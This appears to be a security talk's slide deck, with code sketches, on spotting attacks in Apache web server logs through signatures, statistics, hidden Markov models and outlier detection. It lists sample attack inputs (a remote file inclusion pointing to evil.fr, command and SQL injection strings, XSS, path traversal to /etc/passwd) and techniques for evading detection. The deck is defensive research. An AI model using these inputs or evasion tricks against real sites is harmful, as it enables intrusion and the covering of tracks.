Web Application Forensics

HTTPD Logfile Security Analysis


Jens Müller, Ruhr University Bochum
[email protected]
Scenario

You got pwned


The Log File Problem

● Log files are huge. We are lazy.
● How do we find the „important“ stuff?
● Still using grep/sed/awk?
● Why not use automated tools?
● Because we're simply lacking them right now!
What do we have?

WAF/IDS (automated):
● ModSecurity
● OWASP AppSensor
● PHPIDS
● ...

Log Analytics, Monitoring, Web Log Forensics:
● Piwik
● AWstats
● GoAccess
● Splunk
● PyFlag
● ...

Why not combine both worlds?


Needle in a Haystack?

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141
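The entries above follow Apache's Common Log Format (host, ident, user, timestamp, request line, status, bytes sent). A minimal sketch of turning one line into fields and extracting the query parameters that the detection modules later score, using only the Python standard library. The regular expression and the field names are my own assumptions; Combined Log Format lines (with referer and user agent) would need an extended pattern.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Common Log Format: host ident authuser [date] "request" status bytes
# (assumed pattern; Combined Log Format lines carry extra fields at the end)
CLF = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

def parse_line(line):
    """Return a dict for one CLF entry, or None if the line does not match."""
    m = CLF.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    entry["bytes"] = 0 if entry["bytes"] == "-" else int(entry["bytes"])
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    # the query values are what the detection modules score, keyed by parameter name
    entry["params"] = parse_qsl(url.query, keep_blank_values=True)
    return entry

line = ('212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] '
        '"GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219')
e = parse_line(line)
print(e["host"], e["path"], e["params"], e["status"], e["bytes"])
```

Grouping by `path` and parameter name is what lets per-parameter models (as in the HMM module) be trained separately for every web application.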
Various Kinds of Attacks...

● Remote File Inclusion: /include/?file=http://evil.fr/sh
● Command Execution: /lookup.jsp?ip=|+ls+-l
● SQL Injection: /product.asp?id=0%20or%201=1
● XSS (persistent): /forum.php?post=<script>alert(1);
● Buffer Overflow: /cgi-bin/Count.cgi?user=a\x90\xbf8\xee\xff\xbf8\xee\xff\xbf8\xee\xff\xbf8\xee\xff\xbf8\xee\xff\xbf8 […] \xff\xff
● ...and many more
Attack Detection

● Two approaches: signature-based vs. learning-based
● Detection modules used:
→ Matching against regular expressions („PHPIDS“)
→ Statistics based on character distribution („CHARS“)
→ Machine learning based on hidden Markov models („MCSHMM“)
Signatures + Regular Expressions

● Signatures: [ADD00]
● RegEx: [MC08], [Hei08], [Fry11]

PHPIDS detection module:

Array of URL query values → De-obfuscation, Centrifuge magic, RegEx matching → Result
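PHPIDS itself ships a large, maintained filter set plus its Centrifuge heuristic. The sketch below only illustrates the shape of the pipeline (de-obfuscate, then match every query value against regular expressions) with a handful of hypothetical signatures written for the attack examples listed earlier. It is not the PHPIDS rule set, does not implement Centrifuge, and would miss most real attacks.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical, deliberately tiny signature set (NOT the PHPIDS filter rules)
SIGNATURES = {
    "directory traversal": re.compile(r"(\.\./|\.\.\\)"),
    "remote file inclusion": re.compile(r"^(https?|ftp)://", re.I),
    "command execution": re.compile(r"[|;`]\s*(ls|cat|id|wget|nc)\b"),
    "sql injection": re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+|union\s+select", re.I),
    "xss": re.compile(r"<\s*script|on\w+\s*=|javascript:", re.I),
}

def deobfuscate(value, rounds=3):
    """Repeatedly URL-decode to undo (possibly multiple) percent-encoding layers."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def detect(values):
    """Map each raw query value to the names of the signatures it matches."""
    results = {}
    for v in values:
        clean = deobfuscate(v)
        results[v] = [name for name, rx in SIGNATURES.items() if rx.search(clean)]
    return results

print(detect(["news", "../../etc/passwd", "0%20or%201=1", "|+ls+-l"]))
```

Decoding several rounds before matching is what catches double-encoded payloads such as `%253Cscript%253E`, one of the obfuscation tricks that plain signature matching misses.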
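Basic Statistics

● Length: [KV03]
● Character distribution: [KV03], [WS04]

CHARS detection module:

$$P = \frac{\mu_{|\text{special chars}|}}{|\text{special chars}|}$$

(Probability of a URL query value being benign; μ presumably denotes the mean number of special characters observed for that parameter during training)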
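A minimal sketch of a CHARS-style score P = μ / |special chars|, under assumptions the slide does not state: "special chars" means any character that is not an ASCII letter or digit, μ is the mean special-character count over the training values of the same parameter, and the score is capped at 1 so that a value with no more special characters than average counts as fully benign.

```python
from statistics import mean

def special_count(value):
    # assumption: "special" = anything that is not an ASCII letter or digit
    return sum(1 for ch in value if not (ch.isascii() and ch.isalnum()))

def train_mu(training_values):
    """Mean number of special characters per value seen during training."""
    return mean(special_count(v) for v in training_values)

def chars_score(value, mu):
    """P = mu / |special chars|, capped at 1 (assumption); higher means more likely benign."""
    n = special_count(value)
    if n == 0:
        return 1.0
    return min(1.0, mu / n)

mu = train_mu(["news", "blog", "index", "wiki", "news-2012"])
print(mu, chars_score("news", mu), chars_score("../../etc/passwd", mu))
```

Note that if training never saw a special character (μ = 0), any special character drives P to 0, which is one reason such a module is a weak signal on its own.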


Machine Learning

● Bayes Estimator: [CC04]
● Self-Organizing Maps: [VMV05], [Ste12]
● DFA: [ISBF07]
● Neural Networks: [GER09]
● Wavelet Transformations: [MdAN+11]
● N-grams: [Oza13]
● Hidden Markov Models: [CAG09], [AG10], [AG11], [HTS11], [GJ12], [Choi13]
Hidden Markov Models

MCSHMM detection module:

● Aggregation: build an ensemble of HMMs for every URL query string parameter of every web application (= path)
● Conversion: values [a-zA-Z] → 'A', [0-9] → 'N'
● Training phase: Baum-Welch algorithm
● Testing phase: Viterbi algorithm (returns the probability of a URL query value like „/etc/passwd“ being benign)
● Apply MCS (multiple classifier system): the ensemble's highest probability → best result
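To make the conversion and testing steps concrete, a minimal sketch with two hand-set, hypothetical HMMs (Baum-Welch training is omitted). It maps letters to 'A' and digits to 'N', keeps all other characters as-is (an assumption; the slide only specifies letters and digits), gives symbols never seen in training a small floor probability (assumption), computes the Viterbi path probability in log space, and takes the ensemble's maximum. Dividing by the sequence length is also my assumption, so that values of different length are comparable.

```python
import math

def convert(value):
    """Letters -> 'A', digits -> 'N'; all other characters are kept as-is (assumption)."""
    out = []
    for c in value:
        if c.isascii() and c.isalpha():
            out.append("A")
        elif c.isascii() and c.isdigit():
            out.append("N")
        else:
            out.append(c)
    return "".join(out)

class HMM:
    """Discrete HMM with fixed parameters (Baum-Welch training omitted)."""

    def __init__(self, start, trans, emit, floor=1e-6):
        self.start, self.trans, self.emit = start, trans, emit
        self.floor = floor  # probability for symbols never seen in training (assumption)

    def log_emit(self, state, sym):
        return math.log(self.emit[state].get(sym, self.floor))

    def viterbi_logprob(self, seq):
        """Log-probability of the most likely state path for a non-empty symbol sequence."""
        states = list(self.start)
        v = {s: math.log(self.start[s]) + self.log_emit(s, seq[0]) for s in states}
        for sym in seq[1:]:
            v = {s: max(v[p] + math.log(self.trans[p][s]) for p in states)
                    + self.log_emit(s, sym)
                 for s in states}
        return max(v.values())

def ensemble_score(value, models):
    """MCS step: best per-symbol Viterbi log-probability over the ensemble."""
    seq = convert(value)
    # dividing by len(seq) is an assumption to compare values of different length
    return max(m.viterbi_logprob(seq) / len(seq) for m in models)

# Hypothetical hand-set models for a parameter such as ?page= (not trained on real data)
m1 = HMM(start={"w": 0.9, "s": 0.1},
         trans={"w": {"w": 0.9, "s": 0.1}, "s": {"w": 0.9, "s": 0.1}},
         emit={"w": {"A": 0.95, "N": 0.05}, "s": {"-": 0.5, "_": 0.5}})
m2 = HMM(start={"w": 0.5, "n": 0.5},
         trans={"w": {"w": 0.8, "n": 0.2}, "n": {"w": 0.2, "n": 0.8}},
         emit={"w": {"A": 0.9, "-": 0.1}, "n": {"N": 0.9, "-": 0.1}})

for v in ["news", "news-2012", "../../etc/passwd"]:
    print(v, round(ensemble_score(v, [m1, m2]), 2))
```

Because „.“ and „/“ never occur in the (hypothetical) training symbols, the traversal payload scores far lower than ordinary page names.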
Evaluation: Detection Modules

● Training data: www.nds.rub.de, three weeks of logs
● 63,000 requests altogether / 4,000 requests per day
● All incoming web traffic pre-filtered by a firewall with IPS
● Considered attack-free (for the purpose of measuring false positives)

● Test data: 40 real-world exploits obtained from various sources (9 command execution, 9 LFI, 9 XSS/CSRF, 13 SQLi)
● Payloads placed in five URL query values of two web apps
● Payload injection via the HTTP GET method only!
Evaluation: Detection Modules
[Figure: ROC curve for www.nds.rub.de]
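The ROC curve itself is not recoverable here. As a reminder of how such a curve is built from the setup above (attack-free training traffic for the false-positive rate, the injected exploits for the detection rate), a sketch that computes (FPR, TPR) points when a value is flagged as an attack whenever its benign-probability score falls below a threshold t. The scores in the usage line are made up for illustration and are not results from the evaluation.

```python
def roc_points(benign_scores, attack_scores):
    """(FPR, TPR) pairs for thresholds t: a value is flagged as attack if score < t.

    Scores are "probability of being benign", as produced by e.g. CHARS or MCSHMM.
    """
    thresholds = sorted(set(benign_scores) | set(attack_scores)) + [float("inf")]
    points = [(0.0, 0.0)]
    for t in thresholds:
        fpr = sum(s < t for s in benign_scores) / len(benign_scores)
        tpr = sum(s < t for s in attack_scores) / len(attack_scores)
        points.append((fpr, tpr))
    return points

# illustrative, made-up scores
print(roc_points([0.9, 0.8, 1.0, 0.7], [0.1, 0.3, 0.75]))
```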
The Missing Context...

Detection completed, but still too much data!

● Information about the attacker
→ Group activities into sessions
→ Man-machine distinction
→ GeoIP, DNSBL lookups

● Information about the attack
→ Success evaluation?
Man-machine Distinction

● Session Identification
● Types of Sessions
→ Random Scan? (least dangerous)
→ Targeted Scan? (more dangerous)
→ Human Attacker? (most dangerous)
● Related to Robot Detection Techniques
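The slides do not specify how sessions are identified. A common heuristic, assumed for this sketch, groups requests by client IP and starts a new session after 30 minutes of inactivity. The request-rate helper is a hypothetical, crude man-machine hint: tools tend to fire requests far faster than a human clicks.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def sessionize(requests, timeout=timedelta(minutes=30)):
    """Group (ip, timestamp) pairs into sessions: same IP, gaps <= timeout (assumed rule)."""
    by_ip = defaultdict(list)
    for ip, ts in requests:
        by_ip[ip].append(ts)
    sessions = []
    for ip, times in by_ip.items():
        times.sort()
        current = [times[0]]
        for ts in times[1:]:
            if ts - current[-1] > timeout:
                sessions.append((ip, current))  # inactivity gap closes the session
                current = []
            current.append(ts)
        sessions.append((ip, current))
    return sessions

def requests_per_minute(times):
    """Hypothetical man-machine hint: very high rates suggest a tool rather than a human."""
    span = (times[-1] - times[0]).total_seconds() / 60
    return len(times) / span if span > 0 else float(len(times))
```

With the log excerpt above, the two requests from 134.147.12.77 four seconds apart would fall into a single session.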
[Figure: Man-machine distinction]
[Figure: Geomapping visitors and attacks]
DNSBL Information

What info can be gathered about attackers' origins?

● Listed for spam (b.barracudacentral.org, spam.dnsbl.sorbs.net, sbl.spamhaus.org)
● Botnet (xbl.spamhaus.org, zombie.dnsbl.sorbs.net)
● Open proxies (dnsbl.proxybl.org, http.dnsbl.sorbs.net, socks.dnsbl.sorbs.net)
● Tor network exit node (tor.dnsbl.sectoor.de)
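DNSBL queries follow a simple convention: reverse the octets of the IPv4 address, append the list's zone, and resolve the resulting name; an A record in the answer means "listed", a failed lookup means "not listed". A minimal sketch using the standard resolver. It does not check whether each zone listed above is still in operation, and some operators refuse queries from large public resolvers, so a failed lookup is not proof of a clean address.

```python
import ipaddress
import socket

def dnsbl_query_name(ip, zone):
    """Build the DNSBL lookup name: reversed IPv4 octets + zone."""
    addr = ipaddress.IPv4Address(ip)  # raises ValueError for anything that is not IPv4
    return ".".join(reversed(str(addr).split("."))) + "." + zone

def is_listed(ip, zone):
    """True if the zone returns an A record for ip (performs a live DNS query)."""
    try:
        socket.gethostbyname(dnsbl_query_name(ip, zone))
        return True
    except socket.gaierror:
        return False

ZONES = ["xbl.spamhaus.org", "tor.dnsbl.sectoor.de"]  # taken from the list above
# usage (needs network access): {z: is_listed("212.32.45.167", z) for z in ZONES}
```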
Success Evaluation

● Does yet another unsuccessful scan matter?
→ No
● Did the attacker succeed?
→ Define: what does „succeed“ mean?
→ Info disclosure? File disclosure? Compromise?
● Active method: replay attacks, match against signatures
Active Replay of Attacks

Signatures for file and information disclosure:

File disclosure: UNIX /etc/passwd → 'root:x:0:0:.+:[0-9a-zA-Z/]+'
File disclosure: PHP source code → '<\?\s?php(.*)\?>'
File disclosure: Private keys → '-----BEGIN (D|R)SA PRIVATE KEY-----'
Info disclosure: PHP exception → 'PHP (Notice|Warning|Error)'
Info disclosure: Java IO exception → 'java\.io\.FileNotFoundException: '
Info disclosure: Python IO exception → 'Traceback \(most recent call last\):'
Info disclosure: file system path → 'Call to undefined function.*\(\) in /'
Info disclosure: web root path → ': failed to open stream: '
Info disclosure: MySQL error → 'DBD::mysql::(db|st)(.*)failed'
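Once a logged attack has been replayed (re-sending the logged request to the server is not shown here), the response body is matched against the disclosure signatures. A minimal sketch using the patterns from the table above, with backslash escaping where a literal `?`, `(` or `.` is intended; the escaping of the PHP, Python traceback, Java and "undefined function" patterns is my reading of their intent.

```python
import re

# Disclosure signatures from the slide; escaping added where a literal match is intended
SIGNATURES = [
    ("file disclosure: UNIX /etc/passwd", r"root:x:0:0:.+:[0-9a-zA-Z/]+"),
    ("file disclosure: PHP source code", r"<\?\s?php(.*)\?>"),
    ("file disclosure: private key", r"-----BEGIN (D|R)SA PRIVATE KEY-----"),
    ("info disclosure: PHP exception", r"PHP (Notice|Warning|Error)"),
    ("info disclosure: Java IO exception", r"java\.io\.FileNotFoundException: "),
    ("info disclosure: Python IO exception", r"Traceback \(most recent call last\):"),
    ("info disclosure: file system path", r"Call to undefined function.*\(\) in /"),
    ("info disclosure: web root path", r": failed to open stream: "),
    ("info disclosure: MySQL error", r"DBD::mysql::(db|st)(.*)failed"),
]
COMPILED = [(label, re.compile(rx)) for label, rx in SIGNATURES]

def classify_response(body):
    """Return the labels of all disclosure signatures found in a replayed response body."""
    return [label for label, rx in COMPILED if rx.search(body)]

print(classify_response("root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/usr/sbin"))
```

An empty result does not prove the attack failed; it only means none of these specific disclosure patterns showed up in the response.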
Wait, active methods are too easy...

● How can we evaluate the success of attacks given log file information alone?
134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745
● Any ideas?
HTTP Response Codes

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141
HTTP Response Codes

...do not provide much information:

● 404 → unsuccessful scan?
● 401 | 403 → unsuccessful login
● 400 | 408 | 503 → denial of service?
● 500 → buffer overflow?
● 414 → unsuccessful buffer overflow?
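These rules of thumb can be applied mechanically to requests the detection modules have already flagged. A small sketch; the hint strings restate the bullets above, and the fallback for all other codes is my assumption. Note that the most interesting case, a 200 response to „../../etc/passwd“, is exactly the one the status code cannot decide.

```python
# Rules of thumb from the slide: weak hints, not evidence of success or failure
STATUS_HINTS = {
    404: "unsuccessful scan?",
    401: "unsuccessful login",
    403: "unsuccessful login",
    400: "denial of service?",
    408: "denial of service?",
    503: "denial of service?",
    500: "buffer overflow?",
    414: "unsuccessful buffer overflow?",
}

def status_hint(status):
    """Hint for a flagged request's status code; other codes (e.g. 200) stay undecided."""
    return STATUS_HINTS.get(status, "undecided: needs further analysis")
```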
Bytes-sent Outliers

● What about this: outliers in the „bytes-sent“ field
● Problem: dynamic content might produce various hotspots → we need a density-based algorithm!
● Local Outlier Factor (LOF)
● Experimental; produces a high false-positive rate, but we only apply it to requests already detected as attacks...
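A dependency-free sketch of LOF on the one-dimensional bytes-sent field, following the standard definition (k-distance, reachability distance, local reachability density). The choice k = 2 and the sample values (taken from the log excerpt above) are for illustration only; a real analysis would compute scores per path over far more requests and would likely use a library implementation.

```python
def lof_scores(values, k=2):
    """Local Outlier Factor for each value of a 1-D sample (absolute difference as distance)."""
    n = len(values)
    if n <= k:
        raise ValueError("need more than k values")

    def dist(i, j):
        return abs(values[i] - values[j])

    k_dist, neighbours = [], []
    for i in range(n):
        others = sorted(dist(i, j) for j in range(n) if j != i)
        kd = others[k - 1]  # distance to the k-th nearest neighbour
        k_dist.append(kd)
        # k-neighbourhood: all points within k-distance (ties can make it larger than k)
        neighbours.append([j for j in range(n) if j != i and dist(i, j) <= kd])

    # local reachability density; the tiny epsilon avoids division by zero for duplicates
    lrd = []
    for i in range(n):
        reach = [max(k_dist[o], dist(i, o)) for o in neighbours[i]]
        lrd.append(1.0 / (sum(reach) / len(reach) + 1e-10))

    # LOF: average density of the neighbours relative to the point's own density
    return [sum(lrd[o] for o in neighbours[i]) / len(neighbours[i]) / lrd[i]
            for i in range(n)]

bytes_sent = [36312, 27140, 30745, 36312, 2219, 73141]  # from the log excerpt above
scores = lof_scores(bytes_sent)
flagged = 4  # index of the ../../etc/passwd request, the one detected as an attack
print(round(scores[flagged], 2))
```

In this toy sample the wiki page (73141 bytes) scores even higher than the traversal request, which illustrates the false-positive problem and why the score is only interpreted for requests already flagged as attacks.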
Outliers in bytes-sent

134.147.23.42 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
134.147.61.15 - - [13/Mar/2012:21:02:13 +0100] "GET /webapp.php?page=blog HTTP/1.1" 200 27140
134.147.12.77 - - [13/Mar/2012:20:58:25 +0100] "GET /webapp.php?page=index HTTP/1.1" 200 30745
134.147.12.77 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=news HTTP/1.1" 200 36312
212.32.45.167 - - [13/Mar/2012:21:05:42 +0100] "GET /webapp.php?page=../../etc/passwd HTTP/1.1" 200 2219
134.147.12.131 - - [13/Mar/2012:20:58:29 +0100] "GET /webapp.php?page=wiki HTTP/1.1" 200 73141
Visualization: LORG in Action

Nothing to see here, move on...


Evasion Techniques + Unresolved Issues

● Attack-based
→ Training data poisoning: undermines learning-based detection
→ Payload obfuscation (urlencode, UTF-7 entities, JS Unicode, ...)
→ Use attack vectors that are not logged or not visible (POST, DOM-XSS)
→ Hide the attack flow in several separate steps or in a mass of „noise“

● Logfile-based
→ Manipulation of log files (got r00t?)
→ Denial of service against the log server (or send 0x1A to Apache 1.3)
→ Log flooding: fill up the disk or overwrite logs (rotation)
Thanks for your Attention...

Source Code
● LORG („Logfile Outlier Recognition and Gathering“)
http://github.com/jensvoid/lorg (GPL2; pre-alpha PoC!)

Questions?
